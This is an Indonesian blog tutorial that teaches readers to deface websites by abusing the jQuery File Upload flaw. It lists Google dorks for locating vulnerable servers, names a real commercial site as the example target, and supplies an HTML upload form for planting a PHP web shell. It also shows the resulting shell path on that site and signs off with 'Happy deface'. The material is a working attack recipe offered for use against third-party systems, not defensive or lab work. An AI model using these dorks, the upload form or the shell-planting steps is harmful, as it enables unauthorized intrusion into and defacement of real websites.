Ok langsung aja ya ketutorialnya
1.Dorking bug jQuery File Upload di mesin pencarian google
Dork :
inurl:/server/php/
inurl:/assets/admin/plugins/jquery-file-upload/
inurl:/assets/global/plugins/jquery-file-upload/
inurl:/admin/server/php/
Kembangin lagi maz bro biar dapet yang fresh terus
"Ciri ciri vuln??" bisa seperti ini
{"files":[{}]} dan juga bisa seperti ini lihat digambar
2.pilih web yg mau ditusbol
Dan saya pilih salah satu web sebagai contoh
http://www.starimporters.com/assets/admin/plugins/jquery-fileupload/server/php/
3.masuk ke exploiter online saya disini
atau pake csrf ini
<html>
<body>
<form enctype="multipart/form-data" action="http://www.websitetargetlo.com/assets/admin/plugins/jquery-file-upload/server/php/"method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
Simpan dengan exitensi .html
Lalu buka > pilih shell lu > klik upload
4.Cara menggunakan exploiter online?
Lihat gambar maz bro
Lalu klik lock > pilih shell lu > upload
Kalo shell sukses ter upload??
Lihat gambar lagi kawan :'v
Akses Shellnya
namatargetlo.com/assets/admin/plugins/jquery-fileupload/server/php/files/namashellmu.php
Contoh http://www.starimporters.com/assets/admin/plugins/jquery-fileupload/server/php/files/ind.phtml
Taraa shell sukses ter uploaad :'v
Bila masih ada bingung bisa kontak facebook saya disini
Oke sekian dari saya, bila ada kata yang salah mohon dimaafkan ya :p
Happy deface :*





Comments
Post a Comment